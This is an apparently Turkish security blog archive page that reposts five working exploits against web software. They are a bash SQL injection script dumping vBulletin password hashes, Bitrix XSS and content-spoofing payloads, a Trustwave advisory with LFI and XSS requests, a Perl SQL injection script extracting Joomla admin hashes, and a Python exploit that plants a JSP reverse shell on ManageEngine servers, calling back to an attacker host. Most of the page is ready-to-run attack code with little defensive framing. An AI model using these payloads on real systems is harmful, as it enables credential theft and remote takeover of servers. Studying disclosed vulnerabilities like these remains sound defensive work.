Archive for 24 Ekim 2012

vBGarage Pro vBulletin Mod – SQL Injection

vBGarage Pro vBulletin Mod – SQL Injection Açığı bulundu. Açığın oluşum yeri ve kullanımı şu şekildedir.

#!/bin/bash 
############## 
# MegaManSec # 
############## 
############## 
#  InterNot  # 
############## 
echo "MegaManSec @ www.internot.info"
echo "White-Hat Hacker :)"
if [ -z "$1" ]; then
echo "Usage: $0 http://link.to/forum/"
echo "Example: $0 http://f800riders.org/forum/"
exit 1 
fi
tmpfile="/tmp/vbg.tmp"
echo "securitytoken=guest&s=&searchuser=&search_year=1&model_year=') IN (select (1) from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where usergroupid LIKE '%6%' LIMIT 1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#&make_id=&model_id=&trim_id=&club_id=&category_id=&engine_type=&veh_class=&manufact_id=&product_id=&search_logic=any&do=search_results&submit=%3ESearch" > "$tmpfile"
 
sqldata=`curl -s -X POST -d @"$tmpfile" "$1"garage.php?do=search | grep -i 'MYSQL Error'| awk -F "Duplicate entry" '{print $2}' | awk -F "for key" '{print $1}' | w3m -dump -T text/html` 
if [ "$?" -gt "0" ]; then
echo "Either not vulnerable, or is not showing the hash+pwd, try manually if you don't believe"
exit 1 
fi
echo "Here is username:hash:salt"
echo "$sqldata"
rm "$tmpfile"
exit 0  

Bitrix Site Manager 11.5 XSS / Content Spoofing

Bitrix Site Manager 11.5 XSS / Content Spoofing açıkları bulundu. Açığı ilişkin açıklamalar aşağıdaki gibidir.

I want to warn you about security vulnerabilities in Bitrix Site Manager. It  
is commercial CMS. 
 
These are Content Spoofing and Cross-Site Scripting vulnerabilities. These  
holes bypass built-in WAF and all other protections of Bitrix. 
 
------------------------- 
Affected products: 
------------------------- 
 
Vulnerable are Bitrix Site Manager 11.5 and previous versions. Which consist  
JW Player Pro. 
 
Versions of Bitrix 11.5 after 2012.08.24 must be not affected, because the  
developers fixed these holes after my informing. As I've checked (at main  
sites of developers, where I found these vulnerabilities), they were fixed  
by removing this flash file. 
 
Vulnerabilities are similar to the ones in JW Player  
(http://securityvulns.ru/docs28176.html) and JW Player Pro  
(http://securityvulns.ru/docs28483.html). 
 
For finding these holes, which bypass WAF and all other their protections,  
1C-Bitrix had no need to waste their time and money on conducting  
competition on hacking conference CC9  
(http://www.1c-bitrix.ru/about/life/news/171346/) for bypassing their  
Proactive Protection (WAF) and other protections of CMS, or working with one  
security company, all of which were unable to find these holes in Bitrix for  
many years, but they just should contact me. Or just read my public advisory  
in June concerning vulnerabilities in JW Player. 
 
---------- 
Details: 
---------- 
 
Content Spoofing (WASC-12): 
 
In parameter file there can be set as video, as audio files. 
 
Swf-file of JW Player accepts arbitrary addresses in parameters file and  
image, which allows to spoof content of flash - i.e. by setting addresses of  
video (audio) and/or image files from other site. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&image=1.jpg 
 
Swf-file of JW Player accepts arbitrary addresses in parameter config, which  
allows to spoof content of flash - i.e. by setting address of config file  
from other site (parameters file and image in xml-file accept arbitrary  
addresses). For loading of config file from other site it needs to have  
crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?config=1.xml 
 
1.xml 
 
<config> 
<file>1.flv</file> 
<image>1.jpg</image> 
</config> 
 
Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile,  
which allows to spoof content of flash - i.e. by setting address of playlist  
file from other site (parameters media:content and media:thumbnail in  
xml-file accept arbitrary addresses). For loading of playlist file from  
other site it needs to have crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swfplaylistfile=1.rss&playlist.position=right&playlist.size=200 
 
1.rss 
 
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/"> 
<channel> 
<title>Example playlist</title> 
<item> 
<title>Video #1</title> 
<description>First video.</description> 
<media:content url="1.flv" duration="5" /> 
<media:thumbnail url="1.jpg" /> 
</item> 
<item> 
<title>Video #2</title> 
<description>Second video.</description> 
<media:content url="2.flv" duration="5" /> 
<media:thumbnail url="2.jpg" /> 
</item> 
</channel> 
</rss> 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie) 
 
XSS (WASC-08): 
 
If at the site at page with jwplayer.swf (player.swf) there is possibility  
(via HTML Injection) to include JS code with callback-function, and there  
are 19 such functions in total, then it's possible to conduct XSS attack.  
I.e. JS-callbacks can be used for XSS attack. 
 
Example of exploit: 
 
<script type="text/javascript" src="jwplayer.js"></script> 
<div id="container">...</div> 
<script type="text/javascript"> 
jwplayer("container").setup({ 
flashplayer: "jwplayer.swf", 
file: "1.flv", 
autostart: true, 
height: 300, 
width: 480, 
events: { 
onReady: function() { alert(document.cookie); }, 
onComplete: function() { alert(document.cookie); }, 
onBufferChange: function() { alert(document.cookie); }, 
onBufferFull: function() { alert(document.cookie); }, 
onError: function() { alert(document.cookie); }, 
onFullscreen: function() { alert(document.cookie); }, 
onMeta: function() { alert(document.cookie); }, 
onMute: function() { alert(document.cookie); }, 
onPlaylist: function() { alert(document.cookie); }, 
onPlaylistItem: function() { alert(document.cookie); }, 
onResize: function() { alert(document.cookie); }, 
onBeforePlay: function() { alert(document.cookie); }, 
onPlay: function() { alert(document.cookie); }, 
onPause: function() { alert(document.cookie); }, 
onBuffer: function() { alert(document.cookie); }, 
onSeek: function() { alert(document.cookie); }, 
onIdle: function() { alert(document.cookie); }, 
onTime: function() { alert(document.cookie); }, 
onVolume: function() { alert(document.cookie); } 
} 
}); 
</script> 
 
There is such feature as logo in licensed version of the player. So in  
licensed versions of swf-file there are also the next vulnerabilities: 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=javascript:alert(document.cookie) 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
 
------------ 
Timeline: 
------------  
 
2012.08.16 - informed developers about the first part of vulnerabilities. 
2012.08.17 - on their answer, I gave recommendations to developers about  
fixing vulnerabilities. 
2012.08.19 - informed developers about the second part of vulnerabilities. 
2012.08.20 - announced at my site. 
2012.08.24 - developers informed that they have fixed all these  
vulnerabilities. 
2012.10.20 - disclosed at my site (http://websecurity.com.ua/5992/).  

Bitweaver 2.8.1 Multiple Vulnerabilities

Bitweaver 2.8.1 Versiyonunda XSS açığı bulundu açığın kullanımı, oluşum yerleri ve kullanım şekli şu şekilde;

Trustwave SpiderLabs Security Advisory TWSL2012-016:
Multiple Vulnerabilities in Bitweaver

Published: 10/23/2012
Version: 1.0

Vendor: Bitweaver (http://www.bitweaver.org/)
Product: Bitweaver
Version affected: 2.8.1 and earlier versions

Product description:
Bitweaver is a free and open source web application framework and content
management system. Bitweaver is written in PHP and uses Firebird as a
database backend.

Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193 

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username field"):

http://A.B.C.D/bitweaver/users/register.php


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

Remediation Steps:
The vendor has released a fix to address the Local File Inclusion
vulnerability (finding 1) and several of the Cross-Site Scripting
vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for
the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the
development branch.  Users are recommended to download the latest release
of Bitweaver on http://github.com/bitweaver to address the above issues.

These issue can also be mitigated with the use of technologies, such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often,
Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the
presence of Local File Inclusion vulnerabilities and XSS. Trustwave
technologies that address this issue include the following.

ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, available as part of the SpiderLabs
ModSecurity rules feed.

Trustwave's vulnerability scanning solution, TrustKeeper
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
affected versions.

References
http://www.bitweaver.org/
http://blog.spiderlabs.com/

Vendor Communication Timeline:
04/26/12 - Initial communications with vendor
05/14/12 - Vulnerability disclosed to vendor
05/30/12 - Vendor acknowledges version 3.0 fixes issues
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
09/07/12 - Vendor publishes version 3.1
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
10/23/12 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

Joomla commedia Remote Exploit

joomla commedime eklentisinde sql injection açığı bulunmuş olup, Joomla commedia Remote perl Exploit ve açık hakkındaki açıklamalar şu şekildedir.

 Exploit Title: Joomla commedia Remote Exploit

 dork: inurl:index.php?option=com_commedia
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
  
 Vendor: http://www.ecolora.org/
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers
 
 License: Commercial and Non-Commercial, affects 2 versions

 Demo: http://www.ecolora.org/index.php/demo/commedia

 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
    ########################################
    # Joomla Component (commedia) Remote SQL Exploit
    #----------------------------------------------------------------------------#
    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Opciones de prefijo tabla users:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jml_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="muc_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="sgj_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012

           

ManageEngine Security Manager Plus 5.5 build 5505 Remote SYSTEM/root SQLi

ManageEngine Security Manager Plus 5.5 build 5505 Remote SYSTEM/root SQLi açığına ait python exploit aşağıdaki gibidir

#!/usr/bin/python
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi (Win+Linux)
# Date              : 18-10-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win)
# Software link	    : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux)
# Vendor site       : http://www.manageengine.com/
# Version           : 5.5 build 5505 and lower
# Tested on         : CentOS 5.x + Windows XP/2008
#
# Vulnerability	    : The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse,
#		      the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user,
#		      which makes a remote shell with root/SYSTEM privileges possible....
#
# Fix:
# 1. Go to SMP server system and stop SMP service.
# 2. Download the SMP_Vul_fix.zip file from : http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip
# 3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
# 3. Copy the extracted .jar files to <SMP-HOME>\lib directory (e.g., C:\AdventNet\SecurityManager\lib). [Overwrite the existing jar files and do not rename them]
# 4. Start the SMP service.
#+--------------------------------------------------------------------------------------------------------------------------------+

import urllib, urllib2, cookielib
import sys
import random

if (len(sys.argv) != 5):
    print ""
    print "[*] Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]>0x90.nl) - 2012-05-29"
    print ""
    print "[*] Usage: secman-sql.py <RHOST> <LHOST> <LPORT> <OS>"
    print "[*] I.e.:  ./secman-sql.py www.linux.org 192.168.2.66 8888 linux"
    print "[*] I.e.:  ./secman-sql.py www.microsoft.com 192.168.2.66 8888 win"
    print "[*]"
    print "[*] RHOST = Remote Host which runs Security Manager Plus"
    print "[*] LHOST = IP address of local machine (machine where you run the exploit from"
    print "[*] LPORT = Port on the local machine where you will run NC on for our reverse shell"
    print "[*] OS = linux/win"
    print ""
    print ""
    exit(0)

rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
osys = sys.argv[4]

if osys == 'linux':
	command = "/bin/bash"
elif osys == 'win':
	command = "cmd.exe"
else:
	print "Choose a valid OS, linux/win"
	exit()
	

filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
    filename+=i
filename +=".jsp"

output_path = "../../webapps/SecurityManager/%s" %filename

jsp = '''			<%@page import="java.lang.*"%>
			<%@page import="java.util.*"%>
			<%@page import="java.io.*"%>
			<%@page import="java.net.*"%>

			<%
				class StreamConnector extends Thread
				{
					InputStream is;
					OutputStream os;

					StreamConnector( InputStream is, OutputStream os )
					{
						this.is = is;
						this.os = os;
					}

					public void run()
					{
						BufferedReader in  = null;
						BufferedWriter out = null;
						try
						{
							in  = new BufferedReader( new InputStreamReader( this.is ) );
							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
							char buffer[] = new char[8192];
							int length;
							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
							{
								out.write( buffer, 0, length );
								out.flush();
							}
						} catch( Exception e ){}
						try
						{
							if( in != null )
								in.close();
							if( out != null )
								out.close();
						} catch( Exception e ){}
					}
				}

				try
				{
					Socket socket = new Socket( "''' + lhost +'''", '''+lport+''' );
					Process process = Runtime.getRuntime().exec( "'''+command+'''" );
					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
				} catch( Exception e ) {}
			%>'''


jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")

payload = "1)) "
payload += 'UNION SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"' % (jsp.encode('hex'),output_path)
payload += " FROM mysql.user WHERE 1=((1"

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'))
post_params = urllib.urlencode({'ANDOR' : 'and', 'condition_1' : 'OpenPorts@PORT','operator_1' : 'IN', 'value_1' : payload, 'COUNT' : '1'})

print "[*] Sending evil payload"
resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params)
print "[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename)
resp = opener.open("http://%s:6262/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)